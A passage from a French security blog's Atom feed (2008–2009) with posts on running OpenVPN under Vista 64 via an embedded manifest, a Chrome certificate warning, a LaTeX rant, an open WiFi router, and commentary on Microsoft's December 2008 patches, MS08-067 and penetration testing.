href="http://www.cnetfrance.fr/produits/pc-portables/dell-latitude-x300-39122685.htm"&gt;Dell X300&lt;/a&gt; atteint les 6h30 avec une batterie &lt;span class="Apple-style-span" style="font-style: italic;"&gt;noname&lt;/span&gt;, pour un poids quasiment identique !&lt;/li&gt;&lt;li&gt;Et surtout, un écran brillant (limite &lt;span class="Apple-style-span" style="font-style: italic;"&gt;glossy&lt;/span&gt;) avec des fuites lumineuses en pagaille (en clair, le noir est loin d'être noir). Et ça, c'est rédhibitoire.&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;Maintenant, si vous voulez continuer l'aventure sous Vista 64, voici comment faire fonctionner &lt;a href="http://openvpn.org/"&gt;OpenVPN&lt;/a&gt; 2.1_rc15 sans avoir à élever le processus à chaque connexion.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;En effet, être membre du groupe "&lt;span class="Apple-style-span" style="font-style: italic;"&gt;Network Operators&lt;/span&gt;" ne suffit pas à OpenVPN pour pouvoir mettre à jour les tables de routage. La connexion se passe bien (le driver OpenVPN est signé, ce qui lui permet de fonctionner sous Vista 64), mais il est impossible de joindre les ressources du site distant. La correction la plus simple consiste à lancer le processus en tant qu'administrateur.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pour éviter d'effectuer cette opération "à la main", la solution officielle consiste à créer un fichier "&lt;a href="http://msdn.microsoft.com/en-us/library/aa375632%28VS.85%29.aspx"&gt;.manifest&lt;/a&gt;" attaché à l'application.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;"Dans le temps", il me semblait que créer un fichier "openvpn.exe.manifest" dans le même répertoire qu'OpenVPN était suffisant. Mais dans mon cas cela ne fonctionne pas. Est-ce parce qu'OpenVPN est un processus 32-bits ? Mystère ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;La solution consiste donc à embarquer le fichier ".manifest" dans l'application, à l'aide de l'outil MT.EXE (disponible avec Visual Studio, dont les versions Express - gratuites et illimitées - sont téléchargeables &lt;a href="http://www.microsoft.com/express/"&gt;ici&lt;/a&gt;). Oui, il existe probablement des solutions plus simples à base d'éditeurs de ressources tiers :)&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Le contenu du fichier ".manifest" doit être le suivant:&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;  &amp;lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;  &amp;lt;assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;      &amp;lt;trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;          &amp;lt;security&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;              &amp;lt;requestedPrivileges&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;                  &amp;lt;requestedExecutionLevel level="requireAdministrator"/&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;              &amp;lt;/requestedPrivileges&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;          &amp;lt;/security&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;      &amp;lt;/trustInfo&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-family:courier new;"&gt;  &amp;lt;/assembly&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;La commande à utiliser est:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style="font-size:85%;"&gt;&lt;span style="font-family:'courier new';"&gt;C:\Program Files (x86)\OpenVPN\bin&gt; mt -manifest openvpn-gui-1.0.3.exe.manifest -outputresource:openvpn-gui-1.0.3.exe;#1&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Et voilà !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestversion="1.0"&gt;&lt;trustinfo xmlns="urn:schemas-microsoft-com:asm.v3"&gt;Attention également au sous-répertoire "log", qui trouverait mieux sa place dans &lt;span style="font-size:85%;"&gt;&lt;span style="font-family:courier new;"&gt;%AppData%&lt;/span&gt;&lt;/span&gt; (car propre à chaque utilisateur). Ce répertoire doit être en écriture pour l'utilisateur.&lt;/trustinfo&gt;&lt;/assembly&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-7053957055640042008?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/7053957055640042008/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=7053957055640042008' title='9 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7053957055640042008'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/7053957055640042008'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/01/utiliser-openvpn-21-sous-vista64.html' title='Utiliser OpenVPN 2.1 sous Vista64'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>9</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-1109515123839702013</id><published>2009-01-01T21:30:00.000+01:00</published><updated>2009-01-01T21:51:19.592+01:00</updated><title type='text'>Puisqu'on parle de SSL ...</title><content type='html'>Un beau &lt;a href="http://www.sstic.org/SSTIC09/info.do"&gt;SSTIC&lt;/a&gt;-fail avec Google &lt;a href="http://www.google.com/chrome/?hl=fr"&gt;Chrome&lt;/a&gt; ...&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/sstic_fail.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 768px; height: 296px;" src="http://newsoft.dyndns.org/blog/sstic_fail.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div&gt;Au moins avec une interface pareille, la légendaire Mme Michu devrait comprendre qu'il y a un problème de sécurité sur ce site.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Mais l'&lt;span class="Apple-style-span" style="font-style: italic;"&gt;epic fail&lt;/span&gt; restait à venir - car après avoir passé outre cet avertissement et saisi toutes les informations utiles à ma soumission dans l'interface Web, ma session avait expiré et le POST final a été rejeté.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Aurez-vous la tristesse de ne pas me voir officier sur l'estrade du SSTIC cette année encore ? Non car heureusement en &lt;span class="Apple-style-span" style="font-style: italic;"&gt;dumpant &lt;/span&gt;immédiatement le processus CHROME.EXE (avec &lt;a href="http://metasploit.com/svn/framework2/trunk/tools/"&gt;memdump&lt;/a&gt;), j'ai pu récupérer le contenu de ma soumission dans un &lt;span class="Apple-style-span" style="font-style: italic; "&gt;buffer&lt;/span&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Voici donc une année 2009 qui commence bien. Bonne année à tous !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;PS. Ne vous enflammez pas, le JSESSIONID ci-dessus a expiré :)&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-1109515123839702013?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/1109515123839702013/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=1109515123839702013' title='3 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1109515123839702013'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1109515123839702013'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2009/01/puisquon-parle-de-ssl.html' title='Puisqu&apos;on parle de SSL ...'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-899390483866487142</id><published>2008-12-23T12:10:00.001+01:00</published><updated>2008-12-23T12:15:49.373+01:00</updated><title type='text'>La Haine</title><content type='html'>Je comprends pourquoi &lt;a href="http://www.latex-project.org/"&gt;Latex&lt;/a&gt; est principalement utilisé dans le domaine de la publication scientifique. C'est un outil totalement autiste et NON collaboratif, qui permet aux chercheurs de conserver un contrôle total sur l'information. A contrario, dans le monde de l'entreprise où l'échange de documents et le partage d'informations est une nécessité, Latex s'avère être un outil totalement inadapté.&lt;br /&gt;&lt;br /&gt;Par exemple je rédige un rapport à plusieurs avec des collègues. Le client veut évidemment un document Word - un utilisateur non-&lt;span style="font-style: italic;"&gt;geek&lt;/span&gt; (soit 99,999% de la population) étant totalement incapable d'apprendre le &lt;span style="font-style: italic;"&gt;langage de programmation&lt;/span&gt; Latex et de &lt;span style="font-style: italic;"&gt;recompiler&lt;/span&gt; un document, si toutefois il doit le modifier (ex. gestion documentaire) ou réutiliser une partie du contenu dans une présentation. Mais l'un des participants fait son malin et m'envoie un document Latex, rédigé sous Debian.&lt;br /&gt;&lt;br /&gt;J'ouvre le fichier PDF avec Acrobat Reader pour le copier/coller dans Word. Echec (ou plus exactement \'echec, car Acrobat Reader semble avoir un problème avec les accents).&lt;br /&gt;&lt;br /&gt;J'utilise Acrobat Pro qui dispose des options "Enregistrer sous ..." dans les formats DOC, HTML, TXT et d'autres. Echec également (toujours ce problème d'accents).&lt;br /&gt;&lt;br /&gt;J'ouvre le fichier source. Echec (ou plus exactement Ã©chec, si vous voyez ce que je veux dire ...).&lt;br /&gt;&lt;br /&gt;J'utilise &lt;a href="http://www.chikrii.com/products/tex2word/about/"&gt;Tex2Word&lt;/a&gt;. Echec, bien sûr. Le document utilise beaucoup trop de &lt;span style="font-style: italic;"&gt;packages &lt;/span&gt;exotiques.&lt;br /&gt;&lt;br /&gt;Finalement la seule solution sera d'utiliser un éditeur de texte compatible UTF-8, de copier/coller le source, puis de supprimer la mise en forme à l'aide de la fonction rechercher/remplacer.&lt;br /&gt;&lt;br /&gt;Ensuite une passe de correction des typos s'impose. Je ne parle pas de la grammaire, car c'est un exercice difficile, mais bien des typos idiotes comme "scna" au lieu de "scan"). Et bien que les &lt;span style="font-style: italic;"&gt;fanboys &lt;/span&gt;de Latex me parlent d'&lt;a href="http://aspell.net/"&gt;Aspell&lt;/a&gt;, il faut bien admettre que je n'ai jamais vu personne l'utiliser (ou alors ce logiciel est vraiment très mauvais).&lt;br /&gt;&lt;br /&gt;Bien entendu, il sera totalement impossible de récupérer les graphiques &lt;a href="http://sourceforge.net/projects/pgf/"&gt;PGF/TIKZ&lt;/a&gt;. Aucun autre outil au monde n'est capable de comprendre ce langage de description graphique.&lt;br /&gt;&lt;br /&gt;Et voilà comment Latex tue la productivité et la collaboration. Mais cela aurait pu être pire car je n'ai pas eu besoin de recompiler le document. Or recompiler un document ailleurs que sur la machine d'origine est une tâche impossible, pour tout un tas de raisons comme les dépendances de &lt;span style="font-style: italic;"&gt;packages&lt;/span&gt;, les jeux de caractères, etc. Faites le test sous Debian, Cygwin, OpenBSD puis OpenSolaris. Le simple problème de l'encodage du fichier texte est rédhibitoire.&lt;br /&gt;&lt;br /&gt;Heureusement l'auteur initial du document a généré un code Latex relativement correct. Car le problème dans toutes les sectes, ce sont les adeptes de rang inférieur qui adhèrent au credo de la secte sans en comprendre les fondements. Dans cette population, on trouve les utilisateurs de &lt;a href="http://www.lyx.org/"&gt;Lyx&lt;/a&gt; ou &lt;a href="http://www.toolscenter.org/"&gt;TeXnicCenter&lt;/a&gt; par exemple. Ce dernier offrant plus de 2 Go de &lt;span style="font-style: italic;"&gt;packages &lt;/span&gt;optionnels à installer, et la possibilité de sauvegarder dans la page de code Windows-1252, il est quasiment certain que le résultat produit ne sera pas réutilisable ailleurs.&lt;br /&gt;&lt;br /&gt;Et croyez moi, un utilisateur qui dispose de tous les plugins Firefox, tous les Widgets Vista et tous les plugins &lt;a href="http://en.wikipedia.org/wiki/GKrellM"&gt;GKrellM&lt;/a&gt; va installer tous les &lt;span style="font-style: italic;"&gt;packages &lt;/span&gt;TeXnicCenter ...&lt;br /&gt;&lt;br /&gt;Il n'est pas besoin de chercher très loin l'explication à cet état de fait. &lt;a href="http://en.wikipedia.org/wiki/Leslie_Lamport"&gt;L'auteur de Latex&lt;/a&gt; étant salarié de &lt;a href="http://research.microsoft.com/"&gt;Microsoft Research&lt;/a&gt;, on peut suspecter que Latex n'est qu'un projet destiné à tuer la crédibilité de toute alternative à Microsoft Office ... quoiqu'on m'a dit beaucoup de bien de Google Docs :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-899390483866487142?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/899390483866487142/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=899390483866487142' title='6 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/899390483866487142'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/899390483866487142'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/12/la-haine.html' title='La Haine'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-1741063494079519984</id><published>2008-12-19T09:00:00.000+01:00</published><updated>2008-12-19T09:00:00.869+01:00</updated><title type='text'>WiFi Security Fail</title><content type='html'>Je cherchais du WiFi tandis que ma femme faisait du shopping dans Paris ... et là, c'est le drame.&lt;div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://newsoft.dyndns.org/blog/HackedBy.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 441px; height: 351px;" src="http://newsoft.dyndns.org/blog/HackedBy.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;A priori un routeur Linksys sans clé WEP ni WPA ... et un mot de passe par défaut sur l'interface d'administration ... Si son propriétaire ne s'est pas rendu compte du changement de SSID, c'est probablement qu'il ne sait même pas que son routeur a une fonction WiFi !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Voilà au moins quelqu'un qui n'aura pas de mal à prouver qu'il s'est fait piraté son WiFi, lorsque le décret d'application de la loi &lt;a href="http://fr.wikipedia.org/wiki/Loi_Hadopi"&gt;HADOPI&lt;/a&gt; sera publié !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Au passage, j'en ai profité pour essayer la &lt;a href="http://coderrr.wordpress.com/2008/09/10/get-the-physical-location-of-wireless-router-from-its-mac-address-bssid/"&gt;géolocalisation par BSSID&lt;/a&gt;. Ca marche redoutablement bien à Paris (sauf sur cet exemple). Par contre ils n'ont pas les points d'accès 802.11a dans leur base de données :) &lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/16926911-1741063494079519984?l=news0ft.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://news0ft.blogspot.com/feeds/1741063494079519984/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=16926911&amp;postID=1741063494079519984' title='2 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1741063494079519984'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/16926911/posts/default/1741063494079519984'/><link rel='alternate' type='text/html' href='http://news0ft.blogspot.com/2008/12/wifi-security-fail.html' title='WiFi Security Fail'/><author><name>newsoft</name><uri>http://www.blogger.com/profile/04331742158137961313</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://newsoft.dyndns.org/blog.jpg'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-16926911.post-8886504442254565780</id><published>2008-12-14T21:15:00.001+01:00</published><updated>2008-12-14T21:15:00.833+01:00</updated><title type='text'>Où va la sécurité ?</title><content type='html'>&lt;div&gt;&lt;span class="Apple-style-span" style="font-style: italic; font-weight: bold; "&gt;L'initiative sécurité de Microsoft est-elle un échec ?&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;Il n'a échappé à personne [&lt;a href="http://sid.rstack.org/blog/index.php/311-patch-tuesday-gratine"&gt;sid&lt;/a&gt;][&lt;a href="http://www.breakingpointsystems.com/community/blog/patch-tuesdays-and-drive-by-sundays"&gt;hdm&lt;/a&gt;] que le &lt;a href="http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx"&gt;Patch Tuesday&lt;/a&gt; a été particulièrement prolifique ce mois-ci.&lt;div&gt;&lt;br /&gt;&lt;div&gt;Par ailleurs, de nouvelles failles non corrigées sont exploitées "dans la nature" [&lt;a href="http://www.microsoft.com/technet/security/advisory/960906.mspx"&gt;Wordpad&lt;/a&gt;][&lt;a href="http://www.microsoft.com/technet/security/advisory/961051.mspx"&gt;IE&lt;/a&gt;] et [&lt;a href="http://www.certa.ssi.gouv.fr/site/CERTA-2008-ALE-017/index.html"&gt;MS-SQL&lt;/a&gt;, dont je n'ai pas trouvé trace ailleurs] dès le lendemain - une technique qui vise à maximiser la surface d'exposition des cibles.&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Est-ce donc un échec du &lt;a href="http://microsoft.com/sdl"&gt;SDL&lt;/a&gt; ? Les &lt;a href="http://msdn.microsoft.com/fr-fr/security/msdn.mecapoulets.aspx"&gt;Mécapoulets&lt;/a&gt; sont-ils grillés ?&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Il est très difficile de répondre à cette question car le "marché" des vulnérabilités se brouille de plus en plus.&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Il est évident que le code dit "hérité" (c'est-à-dire le code écrit par des développeurs partis à la retraite avec leurs &lt;span class="Apple-style-span" style="font-style: italic;"&gt;stock-options&lt;/span&gt;) est beaucoup plus difficile à corriger et à maintenir. La majorité des failles trouvées ces dernières années affectent des &lt;span class="Apple-style-span" style="font-style: italic;"&gt;parsers&lt;/span&gt; dans des applications clientes "lourdes" et de conception ancienne (Office, Internet Explorer, Windows Media, etc.). Ce type de code est un puit sans fond pour la recherche de failles, que ce soit par analyse statique, ou par &lt;span class="Apple-style-span" style="font-style: italic;"&gt;fuzzing&lt;/span&gt;. Il n'y a qu'à tenter de lire les&lt;a href="http://www.microsoft.com/interop/osp/default.mspx"&gt; spécifications du format Office&lt;/a&gt; pour se rendre compte de l'impossibilité d'écrire un &lt;span class="Apple-style-span" style="font-style: italic;"&gt;parser&lt;/span&gt; correct.&lt;/li&gt;&lt;li&gt;Microsoft a tout intérêt à produire de "gros" patches, car celà minimise le &lt;span class="Apple-style-span" style="font-style: italic;"&gt;downtime &lt;/span&gt;dû au &lt;span class="Apple-style-span" style="font-style: italic;"&gt;reboot&lt;/span&gt; pour les clients, mais également le nombre de bulletins publiés chaque année (une métrique absurde s'il en est, pourtant largement employée car facilement accessible). Ce qui explique peut-être la &lt;a href="http://seclists.org/fulldisclosure/2008/Dec/0313.html"&gt;lenteur&lt;/a&gt; avec laquelle certaines failles sont patchées.&lt;/li&gt;&lt;li&gt;La criticité des failles est également discutable. Par exemple &lt;a href="http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=761"&gt;l'une des failles&lt;/a&gt; patchées par &lt;a href="http://www.microsoft.com/technet/security/bulletin/ms08-073.mspx"&gt;MS08-073&lt;/a&gt; n'est exploitable que sur Internet Explorer 5.01 ...&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;A ce sujet, et sans rentrer dans les détails techniques, seuls 2 patches me semblent réellement intéressants ce mois-ci : &lt;a href="http://www.microsoft.com/technet/security/bulletin/ms08-076.mspx"&gt;MS08-076&lt;/a&gt; et &lt;a href="http://www.microsoft.com/technet/security/bulletin/ms08-077.mspx"&gt;MS08-077&lt;/a&gt;. En effet, tous les autres sont des corruptions mémoire sans innovation technique.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.microsoft.com/technet/security/Bulletin/MS08-076.mspx"&gt;MS08-076&lt;/a&gt; est une faille probablement détectée en interne chez Microsoft (aucun crédit n'étant donné), qui transpose l'attaque par &lt;span class="Apple-style-span" style="font-style: italic;"&gt;&lt;a href="http://www.microsoft.com/technet/security/Bulletin/MS08-068.mspx"&gt;réflexion de crédences&lt;/a&gt;&lt;/span&gt; aux codecs Windows Media. La deuxième faille concerne la fuite d'authentifiants NTLM via le protocole &lt;a href="http://en.wikipedia.org/wiki/ISATAP"&gt;ISATAP&lt;/a&gt; (un mécanisme de transition IPv6). Pas le genre de technologies qui suscitent beaucoup d'intérêt chez les &lt;span class="Apple-style-span" style="font-style: italic;"&gt;bugs hunters&lt;/span&gt;, et pourtant des failles qui ne nécessitent pas une ligne d'assembleur à exploiter, donc beaucoup plus fiables que la moyenne, et totalement indétectables par les outils de sécurité déployés aujourd'hui en entreprise.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;C'est à se demander si les chercheurs de failles veulent réellement exploiter leurs découvertes, ou juste gagner de l'argent et/ou du crédit avec.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;a href="http://www.microsoft.com/technet/security/Bulletin/MS08-077.mspx"&gt;MS08-077&lt;/a&gt; est une faille de contournement du contrôle d'accès dans le portail SharePoint 2007. Tous ceux qui ont déjà touché de près ou de loin à cette plateforme apprécieront à sa juste valeur la complexité d'une telle découverte.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;MS08-067&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ce Patch Tuesday de décembre ne bouleverse finalement pas le paysage en matière de sécurité : des failles côté client, des patches à passer, des redémarrages planifiés, des codes d'exploitation laissés aux tâcherons de l'&lt;span class="Apple-style-span" style="font-style: italic;"&gt;underground&lt;/span&gt;, dans des pays où le développement d'un outil d'exploitation complet coûte &lt;a href="http://cert.lexsi.com/weblog/index.php/2008/12/12/270-0-day-internet-explorer-la-cybercriminalite-dans-la-breche"&gt;$50/mois&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;La faille la plus significative de cette année 2008 reste à mon sens &lt;a href="http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx"&gt;MS08-067&lt;/a&gt;. Une faille exploitable à distance sans authentification, et nous voilà revenus 4 ans en arrière au temps de &lt;a href="http://fr.wikipedia.org/wiki/Blaster"&gt;Blaster&lt;/a&gt; et &lt;a href="http://fr.wikipedia.org/wiki/Sasser"&gt;Sasser&lt;/a&gt;.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;La seule chose qui a empêché le &lt;span class="Apple-style-span" style="font-style: italic;"&gt;crash&lt;/span&gt; de l'Internet mondial, ce sont les filtrages et/ou la NAT déployée par les FAI depuis. Mais dans les entreprises, l'atterrissage a été douloureux. Le patch n'a pas été identifié comme suffisamment critique pour arrêter la production. Les antivirus, tout comme les soi-disantes solutions de "0day protection", n'avaient pas les bonnes signatures (sic). Les portables et les clés USB continuent d'entrer et sortir du réseau local sans contrôle. Et là, c'est le drame. Heureusement que les &lt;span class="Apple-style-span" style="font-style: italic;"&gt;payloads&lt;/span&gt; embarqués dans les vers actuels, tels que &lt;a href="http://blogs.technet.com/mmpc/archive/2008/11/25/more-ms08-067-exploits.aspx"&gt;Win32/Conficker&lt;/a&gt;, se contentent d'actions insignifiantes telles que voler des authentifiants pour &lt;a href="http://fr.wikipedia.org/wiki/World_of_Warcraft"&gt;WoW&lt;/a&gt; !&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Je n'ai évidemment aucune information sur le sujet, mais lorsque l'armée américaine prétend être &lt;a href="http://idtheftblog.wordpress.com/2008/12/11/russian-hackers-penetrate-pentagon-computer-system/"&gt;victime d'une attaque extrêment complexe&lt;/a&gt;, provenant des services russes, et l'obligeant à &lt;a href="http://www.pcinpact.com/actu/news/47487-pentagon-interdit-utilisation-cles-usb.htm"&gt;interdire l'usage des clés USB&lt;/a&gt; sur ses réseaux, je crains qu'il ne s'agisse que d'un ver très banal mais redoutable sur un réseau qui n'a jamais été exposé au feu d'Internet ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;Le test d'intrusion est-il mort ?&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Dans le même ordre idée, l'article "&lt;a href="http://www.networkworld.com/news/2008/120808-penetration-testing-dead-in.html"&gt;Penetration Testing: Dead in 2009&lt;/a&gt;" m'a encore beaucoup navré.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;D'abord, parce que le test de pénétration régulier fait partie intégrante de presque toutes les "normes" en sécurité (&lt;a href="https://www.pcisecuritystandards.org/"&gt;PCI/DSS&lt;/a&gt;, &lt;a href="http://fr.wikipedia.org/wiki/Suite_ISO/CEI_27000"&gt;ISO 2700x&lt;/a&gt;, et autres), et que ces normes ne vont pas disparaitre en 2009.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Mais surtout parce que l'article est en fait une&lt;span class="Apple-style-span" style="font-style: italic;"&gt; interview &lt;/span&gt;de la société &lt;a href="http://www.fortify.com/"&gt;Fortify&lt;/a&gt;, spécialisée dans l'audit de code source. Et même en supposant que leur outil soit parfait, qu'il soit utilisé dans tous les produits d'ici fin 2008, et que tous les utilisateurs mettent à jour en 2009 avec les produits corrigés, il faudra bien alors admettre que &lt;span class="Apple-style-span" style="font-style: italic;"&gt;le (bon) test d'intrusion n'a rien à voir avec l'exploitation de failles d'implémentation&lt;/span&gt; ...&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Les failles d'implémentation connues:&lt;/div&gt;&lt;div&gt;&lt;ul&gt;&lt;li&gt;Sont facilement détectables par les &lt;a href="http://nessus.org/nessus/"&gt;scanners de vulnérabilités&lt;/a&gt; ;&lt;/li&gt;&lt;li&gt;Peuvent être corrigées rapidement par les patches de l'éditeur ;&lt;/li&gt;&lt;li&gt;Ne marchent pas dans la vraie vie (Windows 2008 64-bit &lt;span class="Apple-style-span" style="font-style: italic;"&gt;anyone&lt;/span&gt; ?).&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;&lt;div&gt;Quant au cas des failles inconnues (souvent appelées "0day"), leur cas est vite évacué car trop peu d'auditeurs en disposent, et l'effort de développement sur les plateformes modernes est trop important dans le cadre d'audits réguliers ou d'audits de conformité. Les tests "&lt;span class="Apple-style-span" style="font-style: italic;"&gt;free for all&lt;/span&gt;", seuls applications possibles de ces failles, sont très rares puisque la plupart des entreprises ne passent déjà pas les cas simples.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Le cas PHP est bien entendu à part, puisque le coût d'une faille &lt;span class="Apple-style-span" style="font-style: 